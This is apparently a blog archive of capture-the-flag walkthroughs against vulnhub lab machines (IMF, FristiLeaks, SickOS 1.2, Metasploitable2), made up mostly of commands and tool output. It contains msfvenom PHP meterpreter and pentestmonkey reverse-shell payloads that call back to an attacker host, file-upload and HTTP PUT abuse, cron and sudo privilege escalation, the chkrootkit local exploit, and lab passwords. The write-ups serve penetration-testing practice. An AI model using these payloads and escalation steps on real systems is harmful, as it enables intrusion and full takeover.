Vannakk.net: 2019

Monday, January 28, 2019

IMF

IMF

netdiscover -r 123.123.123.0/24

123.123.123.106 00:0c:29:a4:69:60 1 60 VMware, Inc.

nmap -T4 -A -v 123.123.123.106
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: IMF - Homepage
MAC Address: 00:0C:29:A4:69:60 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.8, Linux 3.16 - 4.6, Linux 3.2 - 4.8, Linux 4.4
Uptime guess: 198.840 days (since Sat Mar 17 18:30:29 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros

http://123.123.123.106/contact.php

echo "ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ==" |base64 -d

root@KaliLNX:/opt/VMs/IMF# echo "ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ==" |base64 -d
flag2{aW1mYWRtaW5pc3RyYXRvcg==}

Now we have:
flag1{YWxsdGhlZmlsZXM=}

echo "YWxsdGhlZmlsZXM=" |base64 -d
allthefiles

flag2{aW1mYWRtaW5pc3RyYXRvcg==}
echo "aW1mYWRtaW5pc3RyYXRvcg==" |base64 -d
imfadministrator

http://123.123.123.106/imfadministrator/

valid username is rmichaels.

I update the name of the field pass to be pass[].

flag3{Y29udGludWVUT2Ntcw==}
Welcome, rmichaels
IMF CMS

FristiLeaks 1.3

FristiLeaks 1.3

netdiscover -r 123.123.123.0/24
123.123.123.105 00:0c:29:74:95:cc 1 60 VMware, Inc.

nmap -T4 -A -v 123.123.123.105

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods:
| Supported Methods: GET HEAD POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
| http-robots.txt: 3 disallowed entries
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 00:0C:29:74:95:CC (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13
Uptime guess: 49.710 days (since Mon Aug 13 18:43:43 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros

dirb http://123.123.123.105/
view-source:http://123.123.123.105/fristi/

We found:

by eezeepz

BASE64

PNG

IHDRm4ªsRGB®̜烧AMA±
pHYsăƯ¨dRIDATx^v٠a¯

It's PNG

echo "iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg=="|base64 -d > password.png

Let's Login:
http://123.123.123.105/fristi/

user: eezeepz
pass: keKkeKKeKKeKkEkkEk

msfvenom -p php/meterpreter/reverse_tcp lhost=123.123.123.201 lport=4444 –f raw

/*

copy the code and name it: shell.jpg

Upload it to the server:

http://192.168.0.101/fristi/uploads/shell1.php.jpg

* On Kali:

msfconsole
use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 123.123.123.201

set lport 4444

exploit

http://123.123.123.105/fristi/uploads/shell1.php.jpg
http://123.123.123.105/fristi/uploads/shell1.php.jpg

msf exploit(handler) > sessions

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter php/linux apache (48) @ localhost.localdomain 123.123.123.201:4444 -> 123.123.123.105:54014 (123.123.123.105)

meterpreter > shell
Process 1866 created.
Channel 1 created.

id
uid=48(apache) gid=48(apache) groups=48(apache)
pwd
/var/www/html/fristi/uploads

echo "import pty; pty.spawn('/bin/bash')" > /tmp/vnkk.py

python /tmp/vnkk.py

bash-4.1$ cd /home
cd /home
bash-4.1$ ls -l
ls -l
total 20
drwx------. 2 admin admin 4096 Nov 19 2015 admin
drwx---r-x. 5 eezeepz eezeepz 12288 Nov 18 2015 eezeepz
drwx------ 2 fristigod fristigod 4096 Nov 19 2015 fristigod

bash-4.1$ cd eezeepz
cd eezeepz
bash-4.1$ ls -la
ls -la
total 2608
drwx---r-x. 5 eezeepz eezeepz 12288 Nov 18 2015 .
drwxr-xr-x. 5 root root 4096 Nov 19 2015 ..
drwxrwxr-x. 2 eezeepz eezeepz 4096 Nov 17 2015 .Old
-rw-r--r--. 1 eezeepz eezeepz 18 Sep 22 2015 .bash_logout
-rw-r--r--. 1 eezeepz eezeepz 176 Sep 22 2015 .bash_profile
-rw-r--r--. 1 eezeepz eezeepz 124 Sep 22 2015 .bashrc
drwxrwxr-x. 2 eezeepz eezeepz 4096 Nov 17 2015 .gnome
drwxrwxr-x. 2 eezeepz eezeepz 4096 Nov 17 2015 .settings
-rwxr-xr-x. 1 eezeepz eezeepz 24376 Nov 17 2015 MAKEDEV
-rwxr-xr-x. 1 eezeepz eezeepz 33559 Nov 17 2015 cbq
-rwxr-xr-x. 1 eezeepz eezeepz 6976 Nov 17 2015 cciss_id
-rwxr-xr-x. 1 eezeepz eezeepz 56720 Nov 17 2015 cfdisk
-rwxr-xr-x. 1 eezeepz eezeepz 25072 Nov 17 2015 chcpu
-rwxr-xr-x. 1 eezeepz eezeepz 52936 Nov 17 2015 chgrp
-rwxr-xr-x. 1 eezeepz eezeepz 31800 Nov 17 2015 chkconfig
-rwxr-xr-x. 1 eezeepz eezeepz 48712 Nov 17 2015 chmod
-rwxr-xr-x. 1 eezeepz eezeepz 53640 Nov 17 2015 chown
-rwxr-xr-x. 1 eezeepz eezeepz 44528 Nov 17 2015 clock
-rwxr-xr-x. 1 eezeepz eezeepz 4808 Nov 17 2015 consoletype
-rwxr-xr-x. 1 eezeepz eezeepz 129992 Nov 17 2015 cpio
-rwxr-xr-x. 1 eezeepz eezeepz 38608 Nov 17 2015 cryptsetup
-rwxr-xr-x. 1 eezeepz eezeepz 5344 Nov 17 2015 ctrlaltdel
-rwxr-xr-x. 1 eezeepz eezeepz 41704 Nov 17 2015 cut
-rwxr-xr-x. 1 eezeepz eezeepz 14832 Nov 17 2015 halt
-rwxr-xr-x. 1 eezeepz eezeepz 13712 Nov 17 2015 hostname
-rwxr-xr-x. 1 eezeepz eezeepz 44528 Nov 17 2015 hwclock
-rwxr-xr-x. 1 eezeepz eezeepz 7920 Nov 17 2015 kbd_mode
-rwxr-xr-x. 1 eezeepz eezeepz 11576 Nov 17 2015 kill
-rwxr-xr-x. 1 eezeepz eezeepz 16472 Nov 17 2015 killall5
-rwxr-xr-x. 1 eezeepz eezeepz 32928 Nov 17 2015 kpartx
-rwxr-xr-x. 1 eezeepz eezeepz 11464 Nov 17 2015 nameif
-rwxr-xr-x. 1 eezeepz eezeepz 171784 Nov 17 2015 nano
-rwxr-xr-x. 1 eezeepz eezeepz 5512 Nov 17 2015 netreport
-rwxr-xr-x. 1 eezeepz eezeepz 123360 Nov 17 2015 netstat
-rwxr-xr-x. 1 eezeepz eezeepz 13892 Nov 17 2015 new-kernel-pkg
-rwxr-xr-x. 1 eezeepz eezeepz 25208 Nov 17 2015 nice
-rwxr-xr-x. 1 eezeepz eezeepz 13712 Nov 17 2015 nisdomainname
-rwxr-xr-x. 1 eezeepz eezeepz 4736 Nov 17 2015 nologin
-r--r--r--. 1 eezeepz eezeepz 514 Nov 18 2015 notes.txt
-rwxr-xr-x. 1 eezeepz eezeepz 390616 Nov 17 2015 tar
-rwxr-xr-x. 1 eezeepz eezeepz 11352 Nov 17 2015 taskset
-rwxr-xr-x. 1 eezeepz eezeepz 249000 Nov 17 2015 tc
-rwxr-xr-x. 1 eezeepz eezeepz 51536 Nov 17 2015 telinit
-rwxr-xr-x. 1 eezeepz eezeepz 47928 Nov 17 2015 touch
-rwxr-xr-x. 1 eezeepz eezeepz 11440 Nov 17 2015 tracepath
-rwxr-xr-x. 1 eezeepz eezeepz 12304 Nov 17 2015 tracepath6
-rwxr-xr-x. 1 eezeepz eezeepz 21112 Nov 17 2015 true
-rwxr-xr-x. 1 eezeepz eezeepz 35608 Nov 17 2015 tune2fs
-rwxr-xr-x. 1 eezeepz eezeepz 15410 Nov 17 2015 weak-modules
-rwxr-xr-x. 1 eezeepz eezeepz 12216 Nov 17 2015 wipefs
-rwxr-xr-x. 1 eezeepz eezeepz 504400 Nov 17 2015 xfs_repair
-rwxr-xr-x. 1 eezeepz eezeepz 13712 Nov 17 2015 ypdomainname
-rwxr-xr-x. 1 eezeepz eezeepz 62 Nov 17 2015 zcat
-rwxr-xr-x. 1 eezeepz eezeepz 47520 Nov 17 2015 zic
bash-4.1$
bash-4.1$ cat notes.txt
cat notes.txt
Yo EZ,

I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.

- Jerry
bash-4.1$

ls -l /home/admin
ls: cannot open directory /home/admin: Permission denied
bash-4.1$

echo "/usr/bin/../../bin/chmod -R 777 /home/admin" > /tmp/runthis

bash-4.1$ ls -l /home
ls -l /home
total 20
drwxrwxrwx. 2 admin admin 4096 Nov 19 2015 admin
drwx---r-x. 5 eezeepz eezeepz 12288 Nov 18 2015 eezeepz
drwx------ 2 fristigod fristigod 4096 Nov 19 2015 fristigod
bash-4.1$

bash-4.1$ cd /home/admin
cd /home/admin
bash-4.1$ ls -la
ls -la
total 652
drwxrwxrwx. 2 admin admin 4096 Nov 19 2015 .
drwxr-xr-x. 5 root root 4096 Nov 19 2015 ..
-rwxrwxrwx. 1 admin admin 18 Sep 22 2015 .bash_logout
-rwxrwxrwx. 1 admin admin 176 Sep 22 2015 .bash_profile
-rwxrwxrwx. 1 admin admin 124 Sep 22 2015 .bashrc
-rwxrwxrwx 1 admin admin 45224 Nov 18 2015 cat
-rwxrwxrwx 1 admin admin 48712 Nov 18 2015 chmod
-rwxrwxrwx 1 admin admin 737 Nov 18 2015 cronjob.py
-rwxrwxrwx 1 admin admin 21 Nov 18 2015 cryptedpass.txt
-rwxrwxrwx 1 admin admin 258 Nov 18 2015 cryptpass.py
-rwxrwxrwx 1 admin admin 90544 Nov 18 2015 df
-rwxrwxrwx 1 admin admin 24136 Nov 18 2015 echo
-rwxrwxrwx 1 admin admin 163600 Nov 18 2015 egrep
-rwxrwxrwx 1 admin admin 163600 Nov 18 2015 grep
-rwxrwxrwx 1 admin admin 85304 Nov 18 2015 ps
-rw-r--r-- 1 fristigod fristigod 25 Nov 19 2015 whoisyourgodnow.txt
bash-4.1$

bash-4.1$ cat whoisyourgodnow.txt
cat whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG
bash-4.1$

root@KaliLNX:/opt/VMs/FristiLeaks# cat decode.py
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys

def encodeString(str):
base64string= base64.b64encode(str)
return codecs.encode(base64string[::-1], 'rot13')

def decodeString(str):
string = str[::-1]
string = string.encode("rot13")
return base64.b64decode(string)

print decodeString(sys.argv[1])
root@KaliLNX:/opt/VMs/FristiLeaks#

root@KaliLNX:/opt/VMs/FristiLeaks# python decode.py "=RFn0AKnlMHMPIzpyuTI0ITG"
LetThereBeFristi!

Let's Login with: fristigod

bash-4.1$ su fristigod
su fristigod
Password: LetThereBeFristi!

bash-4.1$ id
id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)
bash-4.1$

bash-4.1$ sudo -l
sudo -l
[sudo] password for fristigod: LetThereBeFristi!

Matching Defaults entries for fristigod on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User fristigod may run the following commands on this host:
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
bash-4.1$

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/sh
sh-4.1# id
id
uid=0(root) gid=100(users) groups=100(users),502(fristigod)
sh-4.1#

SickOS

SickOS

netdiscover -r 123.123.123.0/24

123.123.123.104 00:0c:29:16:48:56 1 60 VMware, Inc.

nmap -T4 -A -v 123.123.123.104

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
| 2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_ 256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open http lighttpd 1.4.28
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:16:48:56 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.8, Linux 3.2 - 4.8, Linux 4.4
Uptime guess: 0.001 days (since Mon Oct 1 19:55:13 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

root@KaliLNX:~# dirb http://123.123.123.104/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Oct 1 22:20:20 2018
URL_BASE: http://123.123.123.104/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://123.123.123.104/ ----
+ http://123.123.123.104/index.php (CODE:200|SIZE:163)
==> DIRECTORY: http://123.123.123.104/test/

---- Entering directory: http://123.123.123.104/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Mon Oct 1 22:20:32 2018
DOWNLOADED: 4612 - FOUND: 1
root@KaliLNX:~#

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

root@KaliLNX:/opt/VMs/SickOS1.2# wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz

vim php-reverse-shell.php
$ip = '123.123.123.201'; // CHANGE THIS
$port = 443; // CHANGE THIS

mv php-reverse-shell.php php-reverse-shell.txt

curl --upload-file php-reverse-shell.txt -v --url http://123.123.123.104/test/reverse_shell.php -0 --http1.0

root@KaliLNX:/opt/VMs/SickOS1.2/php-reverse-shell-1.0# curl --upload-file php-reverse-shell.txt -v --url http://123.123.123.104/test/reverse_shell.php -0 --http1.0
* Trying 123.123.123.104...
* TCP_NODELAY set
* Connected to 123.123.123.104 (123.123.123.104) port 80 (#0)
> PUT /test/reverse_shell.php HTTP/1.0
> Host: 123.123.123.104
> User-Agent: curl/7.56.1
> Accept: */*
> Content-Length: 5496
>
* We are completely uploaded and fine
* HTTP 1.0, assume close after body
< HTTP/1.0 201 Created
< Content-Length: 0
< Connection: close
< Date: Mon, 01 Oct 2018 22:27:34 GMT
< Server: lighttpd/1.4.28
<
* Closing connection 0
root@KaliLNX:/opt/VMs/SickOS1.2/php-reverse-shell-1.0#

* On Kali:
msf > use exploit/multi/handler
msf exploit(handler) > set lport 443
lport => 443
msf exploit(handler) > set lhost 123.123.123.201
lhost => 123.123.123.201
msf exploit(handler) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf exploit(handler) > run
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 123.123.123.201:443
msf exploit(handler) > sessions

Active sessions
===============

No active sessions.

msf exploit(handler) > [*] Command shell session 1 opened (123.123.123.201:443 -> 123.123.123.104:49365) at 2018-10-01 23:46:33 +0700

* Openup a browser:
http://123.123.123.104/test/reverse_shell.php

search chkroot
use exploit/unix/local/chkrootkit
show options
set session 1
set lport 8080
run -j

msf exploit(chkrootkit) > run -j
[*] Exploit running as background job 1.

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP double handler on 123.123.123.201:8080
[!] Rooting depends on the crontab (this could take a while)
msf exploit(chkrootkit) > [*] Payload written to /tmp/update
[*] Waiting for chkrootkit to run via cron...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo kKK6pZ1c6QSe32JH;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "kKK6pZ1c6QSe32JH\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 2 opened (123.123.123.201:8080 -> 123.123.123.104:51812) at 2018-10-01 23:51:11 +0700
[+] Deleted /tmp/update

msf exploit(chkrootkit) >

msf exploit(chkrootkit) > sessions

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x86/linux Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UT... 123.123.123.201:443 -> 123.123.123.104:49365 (123.123.123.104)
2 shell cmd/unix 123.123.123.201:8080 -> 123.123.123.104:51812 (123.123.123.104)

msf exploit(chkrootkit) >

msf exploit(chkrootkit) > sessions -i 2
[*] Starting interaction with 2...

490848829
lMaCOMyqmSVqZTgrUYjEGZDYkqDyhGwj
true
dmPZMxaMtEYKwWYIpyATixztqbPVBnrA
nFzkcRgjOJmxJNQwYZMkxEtCFYifTxFg
FWEncLXPGatXZjOxRsbXBYoWrhkKFjjF

pwd
/root
id
uid=0(root) gid=0(root) groups=0(root)
ls -l
total 52
-rw-r--r-- 1 root root 39421 Apr 9 2015 304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz
-r-------- 1 root root 491 Apr 26 2016 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
drwxr-xr-x 2 john john 4096 Apr 12 2016 chkrootkit-0.49
-rw-r--r-- 1 root root 541 Apr 25 2016 newRule
cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually.

Thanks for giving this try.

@vulnhub: Thanks for hosting this UP!.

Metasploitable2

netdiscover -r 123.123.123.0/24

123.123.123.102 00:0c:29:c3:07:99 1 60 VMware, Inc.

root@KaliLNX:~# enum4linux 123.123.123.102
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Oct 1 18:37:40 2018

==========================
| Target Information |
==========================
Target ........... 123.123.123.102
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

=======================================================
| Enumerating Workgroup/Domain on 123.123.123.102 |
=======================================================
[+] Got domain/workgroup name: WORKGROUP

===============================================
| Nbtstat Information for 123.123.123.102 |
===============================================
Looking up status of 123.123.123.102
METASPLOITABLE <00> - B Workstation Service
METASPLOITABLE <03> - B Messenger Service
METASPLOITABLE <20> - B File Server Service
WORKGROUP <00> - B Domain/Workgroup Name
WORKGROUP <1e> - B Browser Service Elections

MAC Address = 00-00-00-00-00-00

========================================
| Session Check on 123.123.123.102 |
========================================
[+] Server 123.123.123.102 allows sessions using username '', password ''

==============================================
| Getting domain SID for 123.123.123.102 |
==============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

=========================================
| OS information on 123.123.123.102 |
=========================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 123.123.123.102 from smbclient:
[+] Got OS info for 123.123.123.102 from srvinfo:
METASPLOITABLE Wk Sv PrQ Unx NT SNT metasploitable server (Samba 3.0.20-Debian)
platform_id : 500
os version : 4.9
server type : 0x9a03

================================
| Users on 123.123.123.102 |
================================
index: 0x1 RID: 0x3f2 acb: 0x00000011 Account: games Name: games Desc: (null)
index: 0x2 RID: 0x1f5 acb: 0x00000011 Account: nobody Name: nobody Desc: (null)
index: 0x3 RID: 0x4ba acb: 0x00000011 Account: bind Name: (null) Desc: (null)
index: 0x4 RID: 0x402 acb: 0x00000011 Account: proxy Name: proxy Desc: (null)
index: 0x5 RID: 0x4b4 acb: 0x00000011 Account: syslog Name: (null) Desc: (null)
index: 0x6 RID: 0xbba acb: 0x00000010 Account: user Name: just a user,111,, Desc: (null)
index: 0x7 RID: 0x42a acb: 0x00000011 Account: www-data Name: www-data Desc: (null)
index: 0x8 RID: 0x3e8 acb: 0x00000011 Account: root Name: root Desc: (null)
index: 0x9 RID: 0x3fa acb: 0x00000011 Account: news Name: news Desc: (null)
index: 0xa RID: 0x4c0 acb: 0x00000011 Account: postgres Name: PostgreSQL administrator,,, Desc: (null)
index: 0xb RID: 0x3ec acb: 0x00000011 Account: bin Name: bin Desc: (null)
index: 0xc RID: 0x3f8 acb: 0x00000011 Account: mail Name: mail Desc: (null)
index: 0xd RID: 0x4c6 acb: 0x00000011 Account: distccd Name: (null) Desc: (null)
index: 0xe RID: 0x4ca acb: 0x00000011 Account: proftpd Name: (null) Desc: (null)
index: 0xf RID: 0x4b2 acb: 0x00000011 Account: dhcp Name: (null) Desc: (null)
index: 0x10 RID: 0x3ea acb: 0x00000011 Account: daemon Name: daemon Desc: (null)
index: 0x11 RID: 0x4b8 acb: 0x00000011 Account: sshd Name: (null) Desc: (null)
index: 0x12 RID: 0x3f4 acb: 0x00000011 Account: man Name: man Desc: (null)
index: 0x13 RID: 0x3f6 acb: 0x00000011 Account: lp Name: lp Desc: (null)
index: 0x14 RID: 0x4c2 acb: 0x00000011 Account: mysql Name: MySQL Server,,, Desc: (null)
index: 0x15 RID: 0x43a acb: 0x00000011 Account: gnats Name: Gnats Bug-Reporting System (admin) Desc: (null)
index: 0x16 RID: 0x4b0 acb: 0x00000011 Account: libuuid Name: (null) Desc: (null)
index: 0x17 RID: 0x42c acb: 0x00000011 Account: backup Name: backup Desc: (null)
index: 0x18 RID: 0xbb8 acb: 0x00000010 Account: msfadmin Name: msfadmin,,, Desc: (null)
index: 0x19 RID: 0x4c8 acb: 0x00000011 Account: telnetd Name: (null) Desc: (null)
index: 0x1a RID: 0x3ee acb: 0x00000011 Account: sys Name: sys Desc: (null)
index: 0x1b RID: 0x4b6 acb: 0x00000011 Account: klog Name: (null) Desc: (null)
index: 0x1c RID: 0x4bc acb: 0x00000011 Account: postfix Name: (null) Desc: (null)
index: 0x1d RID: 0xbbc acb: 0x00000011 Account: service Name: ,,, Desc: (null)
index: 0x1e RID: 0x434 acb: 0x00000011 Account: list Name: Mailing List Manager Desc: (null)
index: 0x1f RID: 0x436 acb: 0x00000011 Account: irc Name: ircd Desc: (null)
index: 0x20 RID: 0x4be acb: 0x00000011 Account: ftp Name: (null) Desc: (null)
index: 0x21 RID: 0x4c4 acb: 0x00000011 Account: tomcat55 Name: (null) Desc: (null)
index: 0x22 RID: 0x3f0 acb: 0x00000011 Account: sync Name: sync Desc: (null)
index: 0x23 RID: 0x3fc acb: 0x00000011 Account: uucp Name: uucp Desc: (null)

user:[games] rid:[0x3f2]
user:[nobody] rid:[0x1f5]
user:[bind] rid:[0x4ba]
user:[proxy] rid:[0x402]
user:[syslog] rid:[0x4b4]
user:[user] rid:[0xbba]
user:[www-data] rid:[0x42a]
user:[root] rid:[0x3e8]
user:[news] rid:[0x3fa]
user:[postgres] rid:[0x4c0]
user:[bin] rid:[0x3ec]
user:[mail] rid:[0x3f8]
user:[distccd] rid:[0x4c6]
user:[proftpd] rid:[0x4ca]
user:[dhcp] rid:[0x4b2]
user:[daemon] rid:[0x3ea]
user:[sshd] rid:[0x4b8]
user:[man] rid:[0x3f4]
user:[lp] rid:[0x3f6]
user:[mysql] rid:[0x4c2]
user:[gnats] rid:[0x43a]
user:[libuuid] rid:[0x4b0]
user:[backup] rid:[0x42c]
user:[msfadmin] rid:[0xbb8]
user:[telnetd] rid:[0x4c8]
user:[sys] rid:[0x3ee]
user:[klog] rid:[0x4b6]
user:[postfix] rid:[0x4bc]
user:[service] rid:[0xbbc]
user:[list] rid:[0x434]
user:[irc] rid:[0x436]
user:[ftp] rid:[0x4be]
user:[tomcat55] rid:[0x4c4]
user:[sync] rid:[0x3f0]
user:[uucp] rid:[0x3fc]

============================================
| Share Enumeration on 123.123.123.102 |
============================================
WARNING: The "syslog" option is deprecated

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.

Server Comment
--------- -------

Workgroup Master
--------- -------
WORKGROUP

[+] Attempting to map shares on 123.123.123.102
//123.123.123.102/print$ Mapping: DENIED, Listing: N/A
//123.123.123.102/tmp Mapping: OK, Listing: OK
//123.123.123.102/opt Mapping: DENIED, Listing: N/A
//123.123.123.102/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
//123.123.123.102/ADMIN$ Mapping: DENIED, Listing: N/A

=======================================================
| Password Policy Information for 123.123.123.102 |
=======================================================
[E] Unexpected error from polenum:
Traceback (most recent call last):
File "/usr/bin/polenum", line 33, in
from impacket.dcerpc import dcerpc_v4, dcerpc, transport, samr
ImportError: cannot import name dcerpc_v4
[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 0

=================================
| Groups on 123.123.123.102 |
=================================

[+] Getting builtin groups:

